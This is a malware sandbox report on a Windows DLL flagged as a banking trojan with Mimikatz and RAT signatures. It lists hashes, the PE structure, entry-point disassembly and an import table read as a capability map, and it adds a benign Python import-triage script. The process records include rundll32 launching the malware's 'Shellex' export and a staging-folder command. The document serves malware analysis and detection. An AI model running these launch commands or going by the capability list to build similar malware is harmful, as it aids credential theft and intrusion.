Original Sample Name: f036b3031238597750e077c2d03b2bc41d089f9db461244059db8485fac28e63.dll
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winDLL@20/1@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 9
• Number of non-executed functions: 279
Cookbook Comments:
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: l10U7QN0CY.dll
                                    No simulations
                                    No context
                                    No context
                                    No context
                                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\Public\Documents\MM\svchos1.exe | KlzXRW4Ag7.dll | Get hash | malicious | GhostRat, Mimikatz, Nitol | Browse |
 | ZfJheGhddq.dll | Get hash | malicious | GhostRat, Mimikatz, Nitol | Browse |
 | PD5dVJNpz7.dll | Get hash | malicious | GhostRat, Mimikatz, Nitol | Browse |
 | 7YtmCkMUx3.dll | Get hash | malicious | GhostRat, Mimikatz, Nitol | Browse |
 | tROeAyXq2X.exe | Get hash | malicious | Mimikatz, RunningRAT | Browse |
 | me.exe | Get hash | malicious | RunningRAT | Browse |
 | gE4NVCZDRk.exe | Get hash | malicious | Bdaejec, RunningRAT | Browse |
 | uHmFQqHIIA.exe | Get hash | malicious | RunningRAT | Browse |
 | ofR1Hd4NPM.exe | Get hash | malicious | RunningRAT | Browse |
 | 9JQ3JboYdz.exe | Get hash | malicious | RunningRAT | Browse |
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 61440
Entropy (8bit): 6.199746098562656
Encrypted: false
SSDEEP: 1536:H9ykYCTdiHQKrFXmw2RQln5IUmDjoX6+:HlMHprF2nRQln5I
MD5: 889B99C52A60DD49227C5E485A016679
SHA1: 8FA889E456AA646A4D0A4349977430CE5FA5E2D7
SHA-256: 6CBE0E1F046B13B29BFA26F8B368281D2DDA7EB9B718651D5856F22CC3E02910
SHA-512: 08933106EAF338DD119C45CBF1F83E723AFF77CC0F8D3FC84E36253B1EB31557A54211D1D5D1CB58958188E32064D451F6C66A24B3963CCCD3DE07299AB90641
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: KlzXRW4Ag7.dll, Detection: malicious, Browse
• Filename: ZfJheGhddq.dll, Detection: malicious, Browse
• Filename: PD5dVJNpz7.dll, Detection: malicious, Browse
• Filename: 7YtmCkMUx3.dll, Detection: malicious, Browse
• Filename: tROeAyXq2X.exe, Detection: malicious, Browse
• Filename: me.exe, Detection: malicious, Browse
• Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
• Filename: uHmFQqHIIA.exe, Detection: malicious, Browse
• Filename: ofR1Hd4NPM.exe, Detection: malicious, Browse
• Filename: 9JQ3JboYdz.exe, Detection: malicious, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.....^...^...^.pb^...^.c._...^.c._...^...^c..^.c._...^.c._...^.c._...^.c.^...^.c._...^Rich...^........PE..L...9..j.................b...........a............@..........................@............@.............................................hg...................0..........T........................... ........................m..`....................text...La.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat...............~..............@....rsrc...hg.......h..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.332307039094522
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: l10U7QN0CY.dll
File size: 1'269'760 bytes
MD5: 4a2579809a60dafdd9da2c50484e8735
SHA1: d3e1c79b5b5d7ab8ff2313d7696998527a3f5bd1
SHA256: f036b3031238597750e077c2d03b2bc41d089f9db461244059db8485fac28e63
SHA512: 2af6ee811093ae53ec4d9358d44a5d6fbc32a85b509502010490c4eb324dd22cc659478ea2d39aa37b70dac71ca9544e427acd440f4ff1024bf0557ec0c666ff
SSDEEP: 24576:LohYJJUEWaGjGM7hiBrDaFy73fChNqhXWSNNmbCTM5GrkQPXHMtR1tD1b1tTkRoN:Lorx7TkQ
TLSH: D1455B43E2B64CA3D7D80034DC6AE7B677347A1D97F786737240EDDAB5A22907D2420A
File Content Preview: MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........q!_..r_..r_..r...r^..ri..rY..rx.dr]..r../re..r_..r...r0..r^..r0..r[..r0..r[..r$..rX..r...rX..ri..r]..ri..r]..r..@r[..r..Br@..
Icon Hash: 7ae282899bbab082
Entrypoint: 0x1002d2eb
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp: 0x672371E7 [Thu Oct 31 12:02:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 6718574bfa82ab04bcaf82fa9136fc6c
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        push ebx
                                                        mov ebx, dword ptr [ebp+08h]
                                                        push esi
                                                        mov esi, dword ptr [ebp+0Ch]
                                                        push edi
                                                        mov edi, dword ptr [ebp+10h]
                                                        test esi, esi
                                                        jne 00007FE5EC7D505Bh
                                                        cmp dword ptr [1012F1F4h], 00000000h
                                                        jmp 00007FE5EC7D5078h
                                                        cmp esi, 01h
                                                        je 00007FE5EC7D5057h
                                                        cmp esi, 02h
                                                        jne 00007FE5EC7D5074h
                                                        mov eax, dword ptr [10158620h]
                                                        test eax, eax
                                                        je 00007FE5EC7D505Bh
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call eax
                                                        test eax, eax
                                                        je 00007FE5EC7D505Eh
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007FE5EC7D4F6Ah
                                                        test eax, eax
                                                        jne 00007FE5EC7D5056h
                                                        xor eax, eax
                                                        jmp 00007FE5EC7D50A0h
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007FE5EC7C91CAh
                                                        cmp esi, 01h
                                                        mov dword ptr [ebp+0Ch], eax
                                                        jne 00007FE5EC7D505Eh
                                                        test eax, eax
                                                        jne 00007FE5EC7D5089h
                                                        push edi
                                                        push eax
                                                        push ebx
                                                        call 00007FE5EC7D4F46h
                                                        test esi, esi
                                                        je 00007FE5EC7D5057h
                                                        cmp esi, 03h
                                                        jne 00007FE5EC7D5078h
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007FE5EC7D4F35h
                                                        test eax, eax
                                                        jne 00007FE5EC7D5055h
                                                        and dword ptr [ebp+0Ch], eax
                                                        cmp dword ptr [ebp+0Ch], 00000000h
                                                        je 00007FE5EC7D5063h
                                                        mov eax, dword ptr [10158620h]
                                                        test eax, eax
                                                        je 00007FE5EC7D505Ah
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call eax
                                                        mov dword ptr [ebp+0Ch], eax
                                                        mov eax, dword ptr [ebp+0Ch]
                                                        pop edi
                                                        pop esi
                                                        pop ebx
                                                        pop ebp
                                                        retn 000Ch
                                                        jmp dword ptr [100B7424h]
                                                        jmp dword ptr [100B7420h]
                                                        jmp dword ptr [100B7418h]
                                                        jmp dword ptr [100B73F4h]
                                                        jmp dword ptr [100B73BCh]
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        jmp dword ptr [00000000h]
                                                        Programming Language:
                                                        • [ C ] VS98 (6.0) SP6 build 8804
                                                        • [IMP] VS2005 build 50727
                                                        • [C++] VS98 (6.0) SP6 build 8804
                                                        • [ C ] VS98 (6.0) build 8168
                                                        • [C++] VS98 (6.0) build 8168
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        • [LNK] VS98 (6.0) imp/exp build 8168
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xf9740 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf7088 | 0x190 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x199000 | 0x10 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x19a000 | 0x66a8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb7000 | 0x754 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x97d6a | 0x98000 | e897ade4613f14c186e47314e615a48e | False | 0.4028191817434211 | data | 6.771812210263706 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rodata | 0x99000 | 0x2e50 | 0x3000 | 0ca3681ca0d1b13e402ba8d29971b5f2 | False | 0.28173828125 | data | 6.052273401613891 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rotext | 0x9c000 | 0x1ae92 | 0x1b000 | 0cf40eb5df713fafa4fc5205f48cf359 | False | 0.14991138599537038 | data | 5.9970516003376195 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb7000 | 0x42780 | 0x43000 | 134eaca3747752ce75713a6fe585e691 | False | 0.09635902518656717 | data | 3.5858946280363218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xfa000 | 0x9e7c0 | 0x32000 | f2a1d1684fbf275c21a726939f4136b9 | False | 0.299365234375 | data | 5.521664838208221 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x199000 | 0x10 | 0x1000 | 620f0b67a91f7f74151bc5be745b7110 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x19a000 | 0x803e | 0x9000 | 6580d84a594dafda37b08b4e7c902d0c | False | 0.5600043402777778 | data | 5.559864488964834 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        DLLImport
                                                        KERNEL32.dllProcess32First, GetSystemDirectoryA, TerminateProcess, OpenProcess, ExitProcess, GetVersion, DeviceIoControl, Beep, GetVersionExA, GetModuleFileNameA, WinExec, TerminateThread, GetTickCount, GetCommandLineA, FreeConsole, GetCurrentProcessId, GetConsoleProcessList, AttachConsole, GetWindowsDirectoryA, WideCharToMultiByte, MultiByteToWideChar, GlobalSize, QueryPerformanceFrequency, QueryPerformanceCounter, LoadLibraryW, GlobalMemoryStatusEx, GetDriveTypeA, ReleaseMutex, CreateMutexA, GetCurrentThread, GetEnvironmentVariableA, GetCurrentThreadId, CreatePipe, CopyFileA, lstrcpyW, Module32Next, lstrcmpiA, Module32First, CreateRemoteThread, GetProcessId, ResumeThread, OpenThread, Thread32Next, Thread32First, SuspendThread, Process32Next, GlobalMemoryStatus, GetComputerNameA, GetPrivateProfileStringA, SystemTimeToTzSpecificLocalTime, lstrcpynA, lstrcmpA, lstrcatA, CreateProcessA, GetProcAddress, lstrcpyA, CreateDirectoryA, GetLastError, DeleteFileA, GetCurrentProcess, IsWow64Process, SetFilePointer, WriteFile, CreateFileA, GetFileSize, ReadFile, lstrlenA, FreeLibrary, IsBadReadPtr, VirtualProtect, HeapReAlloc, HeapAlloc, GetProcessHeap, HeapFree, CancelIo, SetEvent, ResetEvent, CreateEventA, LocalAlloc, LocalReAlloc, LocalSize, LocalFree, Sleep, GetFileAttributesA, GetModuleHandleA, GetLocalTime, GlobalAlloc, GlobalLock, GlobalFree, GlobalUnlock, CreateThread, VirtualAlloc, EnterCriticalSection, LeaveCriticalSection, VirtualFree, DeleteCriticalSection, InitializeCriticalSection, InterlockedExchange, CreateToolhelp32Snapshot, GetFileAttributesExA, FileTimeToSystemTime, MoveFileA, SetFileAttributesA, RemoveDirectoryA, FindFirstFileA, FindNextFileA, FindClose, GetLogicalDriveStringsA, GetVolumeInformationA, GetPriorityClass, GetDiskFreeSpaceExA, WaitForSingleObject, CloseHandle, LoadLibraryA, GetSystemInfo
                                                        USER32.dllSetRect, GetCursorPos, GetCursorInfo, PostMessageA, SetCursorPos, WindowFromPoint, SetCapture, MapVirtualKeyA, SystemParametersInfoA, ReleaseDC, BlockInput, DestroyCursor, LoadCursorA, GetDC, GetSystemMetrics, ChangeDisplaySettingsA, FindWindowA, ShowWindow, MoveWindow, GetWindowRect, SwapMouseButton, ExitWindowsEx, EnumWindows, GetKeyState, GetAsyncKeyState, GetForegroundWindow, GetWindowTextA, CharNextA, GetDesktopWindow, wsprintfA, EmptyClipboard, SetClipboardData, OpenClipboard, GetClipboardData, CloseClipboard, GetWindowLongA, PostQuitMessage, SetWindowLongA, LoadIconA, SetClassLongA, DestroyWindow, SetFocus, GetWindowTextLengthA, SetWindowTextA, SetDlgItemTextA, CreateDialogIndirectParamA, GetDlgItem, SetWindowPos, OpenInputDesktop, GetDlgItemTextA, CloseDesktop, GetThreadDesktop, GetUserObjectInformationA, SetThreadDesktop, GetWindowThreadProcessId, WaitForInputIdle, GetClassNameA, GetWindow, GetLastInputInfo, IsIconic, MessageBoxA, IsWindowVisible, GetMessageA, IsDialogMessageA, TranslateMessage, SendMessageA, DispatchMessageA
                                                        GDI32.dllGetDeviceCaps, CreateDIBSection, CreateCompatibleDC, DeleteObject, DeleteDC, BitBlt, GetRegionData, CombineRgn, CreateRectRgnIndirect, GetDIBits, CreateCompatibleBitmap, SelectObject
                                                        ADVAPI32.dllRegOpenKeyA, GetTokenInformation, LookupAccountSidA, AbortSystemShutdownA, RegCloseKey, RegOpenKeyExA, GetUserNameA, CloseEventLog, ClearEventLogA, OpenEventLogA, RegSetValueExA, RegCreateKeyA, StartServiceA, CloseServiceHandle, OpenServiceA, OpenSCManagerA, SetServiceStatus, DeleteService, FreeSid, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, AllocateAndInitializeSid, RegEnumValueA, RegEnumKeyExA, RegQueryValueExA, RegDeleteValueA, RegDeleteKeyA, RegQueryInfoKeyA, RegCreateKeyExA, UnlockServiceDatabase, ChangeServiceConfigA, LockServiceDatabase, ControlService, QueryServiceStatus, QueryServiceConfig2A, QueryServiceConfigA, EnumServicesStatusA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, CheckTokenMembership
                                                        SHELL32.dllShellExecuteExA, SHGetFolderPathA, SHGetSpecialFolderPathA, SHGetFileInfoA, ShellExecuteA
                                                        ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                        OLEAUT32.dllSysFreeString
                                                        MFC42.DLL
MSVCRT.dll: _adjust_fdiv, _initterm, _onexit, __dllonexit, ??1type_info@@UAE@XZ, _snprintf, swprintf, _splitpath, strncpy, atol, strncat, realloc, fgets, srand, time, isdigit, _iob, _access, wcstombs, mbstowcs, _errno, _wcsupr, _strcmpi, _itoa, _strnicmp, fprintf, sscanf, getenv, vsprintf, exit, __CxxFrameHandler, memmove, ceil, _ftol, strstr, wcslen, wcscpy, sprintf, printf, fclose, fopen, remove, atoi, free, malloc, strncmp, _CIpow, floor, strchr, tolower, _CxxThrowException, _stricmp, _except_handler3, strrchr, _strlwr, wcsstr, rand, system
MSVCP60.dll: ??0_Lockit@std@@QAE@XZ, ??1_Lockit@std@@QAE@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z, ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z, ?_Xlen@std@@YAXXZ, ?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z, ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z, ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z, ?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB, ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z, ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z, ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z, ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z, ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ, ?_Xran@std@@YAXXZ, ?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB, ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z, ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z, ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ, ??0Init@ios_base@std@@QAE@XZ, ??1Init@ios_base@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ, ??1_Winit@std@@QAE@XZ
WINMM.dll: mciSendStringA, waveInGetNumDevs
WS2_32.dll: gethostname, inet_addr, getsockname, bind, getpeername, accept, listen, sendto, recvfrom, ntohs, inet_ntoa, send, closesocket, recv, select, gethostbyname, connect, setsockopt, WSAIoctl, WSACleanup, WSAStartup, __WSAFDIsSet, ioctlsocket, socket, htons
iphlpapi.dll: GetIfTable
dwmapi.dll: DwmIsCompositionEnabled
SHLWAPI.dll: PathFindFileNameA, PathUnquoteSpacesA, PathRemoveArgsA, PathGetArgsA, SHDeleteKeyA
WININET.dll: InternetGetConnectedState, InternetReadFile, HttpSendRequestA, InternetOpenUrlA, HttpOpenRequestA, InternetOpenA, InternetConnectA, InternetCloseHandle, HttpQueryInfoA
NETAPI32.dll: NetUserSetInfo, NetUserAdd, NetUserGetLocalGroups, NetApiBufferFree, NetUserGetInfo, NetUserEnum, NetLocalGroupAddMembers, NetUserDel
PSAPI.DLL: GetProcessMemoryInfo, GetModuleFileNameExA
WTSAPI32.dll: WTSEnumerateSessionsA, WTSDisconnectSession, WTSLogoffSession, WTSQuerySessionInformationA, WTSFreeMemory, WTSQuerySessionInformationW
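The import table is the fastest capability read on this DLL and lines up with the signatures in the summary: NETAPI32 (NetUserAdd, NetUserSetInfo, NetLocalGroupAddMembers, NetUserDel) for local account manipulation, WTSAPI32 for enumerating, disconnecting and logging off sessions, WININET for HTTP, WS2_32 for raw sockets (listen/accept as well as connect), WINMM waveInGetNumDevs for audio capture and SHLWAPI SHDeleteKeyA for registry cleanup. As an added example, not Joe Sandbox code, the Python below parses rows in the form the report extracts them (DLL name either fused to or separated from its import list) and buckets the imports by capability. The bucket names and the API-to-bucket mapping are my own triage heuristic; the sample rows are copied from the table above, with the two C runtime rows left out for brevity.

```python
import re

# One extracted import-table row: DLL name, optional ": " or whitespace, comma-separated imports.
IMPORT_ROW = re.compile(r"^\s*(\S+?\.(?:dll|DLL)):?\s*(.*)$")

# Capability buckets. This mapping is an assumption of mine for triage, not Joe Sandbox's signature logic.
CAPABILITIES = {
    "local account manipulation": {"NetUserAdd", "NetUserSetInfo", "NetUserDel",
                                   "NetLocalGroupAddMembers"},
    "terminal session control":   {"WTSEnumerateSessionsA", "WTSDisconnectSession",
                                   "WTSLogoffSession"},
    "http client (possible c2)":  {"InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                                   "HttpSendRequestA", "InternetReadFile", "InternetOpenUrlA"},
    "raw tcp/udp sockets":        {"socket", "connect", "listen", "accept", "send", "recv",
                                   "sendto", "recvfrom"},
    "audio capture":              {"waveInGetNumDevs", "mciSendStringA"},
    "registry key deletion":      {"SHDeleteKeyA"},
    "process inspection":         {"GetProcessMemoryInfo", "GetModuleFileNameExA"},
}

# Rows copied from the report's import table (MSVCRT.dll and MSVCP60.dll omitted).
REPORT_IMPORTS = """
WINMM.dllmciSendStringA, waveInGetNumDevs
WS2_32.dllgethostname, inet_addr, getsockname, bind, getpeername, accept, listen, sendto, recvfrom, ntohs, inet_ntoa, send, closesocket, recv, select, gethostbyname, connect, setsockopt, WSAIoctl, WSACleanup, WSAStartup, __WSAFDIsSet, ioctlsocket, socket, htons
iphlpapi.dllGetIfTable
dwmapi.dllDwmIsCompositionEnabled
SHLWAPI.dllPathFindFileNameA, PathUnquoteSpacesA, PathRemoveArgsA, PathGetArgsA, SHDeleteKeyA
WININET.dllInternetGetConnectedState, InternetReadFile, HttpSendRequestA, InternetOpenUrlA, HttpOpenRequestA, InternetOpenA, InternetConnectA, InternetCloseHandle, HttpQueryInfoA
NETAPI32.dllNetUserSetInfo, NetUserAdd, NetUserGetLocalGroups, NetApiBufferFree, NetUserGetInfo, NetUserEnum, NetLocalGroupAddMembers, NetUserDel
PSAPI.DLLGetProcessMemoryInfo, GetModuleFileNameExA
WTSAPI32.dllWTSEnumerateSessionsA, WTSDisconnectSession, WTSLogoffSession, WTSQuerySessionInformationA, WTSFreeMemory, WTSQuerySessionInformationW
"""


def parse_import_table(text):
    """Return {dll_name: [import, ...]} from extracted report rows; non-matching lines are skipped."""
    table = {}
    for line in text.splitlines():
        m = IMPORT_ROW.match(line)
        if not m:
            continue
        dll, imports = m.group(1), m.group(2)
        table[dll] = [name.strip() for name in imports.split(",") if name.strip()]
    return table


def triage_imports(table):
    """Map each capability bucket to the sorted imports that hit it; buckets with no hit are dropped."""
    all_imports = {name for names in table.values() for name in names}
    hits = {}
    for capability, apis in CAPABILITIES.items():
        matched = sorted(all_imports & apis)
        if matched:
            hits[capability] = matched
    return hits


if __name__ == "__main__":
    for capability, matched in triage_imports(parse_import_table(REPORT_IMPORTS)).items():
        print(f"{capability}: {', '.join(matched)}")
```

Imports are only a hint: the report also shows the sample resolving APIs at run time through GetModuleHandleA/LoadLibraryA/GetProcAddress, so anything fetched that way will not appear in the static table and has to be read from the execution graph instead.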
Name        Ordinal    Address
Shellex     1          0x1001efd0
Timestamp                            Source Port    Dest Port    Source IP        Dest IP
Nov 18, 2024 14:19:34.863145113 CET  53             53589        162.159.36.2     192.168.2.7
Nov 18, 2024 14:19:35.506114960 CET  53             54279        1.1.1.1          192.168.2.7

                                                        Target ID:5
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll"
                                                        Imagebase:0x7c0000
                                                        File size:126'464 bytes
                                                        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:9
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,Shellex
                                                        Imagebase:0x150000
                                                        File size:61'440 bytes
                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                                                        Imagebase:0x150000
                                                        File size:61'440 bytes
                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:11
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
